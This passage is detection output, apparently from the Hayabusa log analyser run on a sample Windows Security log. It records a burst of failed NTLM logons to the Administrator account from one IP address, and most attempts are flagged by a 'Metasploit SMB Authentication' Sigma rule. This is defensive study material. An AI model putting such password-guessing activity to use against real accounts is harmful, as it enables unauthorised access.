Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B00w8dZG3sT2Lsqo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aKGq6qrchp4SLvT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnScYHBCKOSHItsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r8UMBM326M7a4njd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kTdYWOi6p7etRfya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JWSlcEVzj5lGtVg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xc77wukLTPOYAzj2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4WmTwTGuwDN6YXn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeN4cSffFA04oOje : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eYFPV1kGALqX8jyO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIlhxT4qqo5bCsU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: btoOskH0112h7MTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWUhQJBcS7XbMJUq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E70qmXDDWqmWJjyU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oX0L8wf6nt2grLvn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0D8BwniiXsjfkYqE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSWYo4mphuvKHQHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: im8an1mDle9f8skd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aOyLWd5CAAjnJt3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7gI55uWlshCLw3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l7UogJ8bBw6Epbht : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIl0QRFHXCVAHWdV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OxPv9v4TxFvS9JMy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHMGfCorrLXpDyeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KQTKgFibIa8NWExO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEnx3upH3Om0wHn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KlNbW1ljPSTdgUKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w2WMd3HugfjSwJPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yEy0C6dMhysbNDrX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxlayd8pnAZ3dZ2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PhKO1jyWqVEdC9w2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dAH2mHJ4ZK5GS2p0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lV2ZIWGGwlkyEMRB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sum2yMFio9KLwZk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fICXSRvv9Vm0uVpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IgrOk6Fjp0QtfJ3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OPKoHLtxNoiG65sl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NctXRH1DR3slfVxQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vLnAs36K1mTivu2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7crZQ0eQ5RDNIp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yHjgGhEtZgNwjaii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5gi2SS2mQiDylQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kqWJGguiWBEplJiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWP4luPa3lFolQVI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5K9DQWbzslRZZMSC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qm0L113v24jlfjx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seuUjyGmNlyYT4tU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 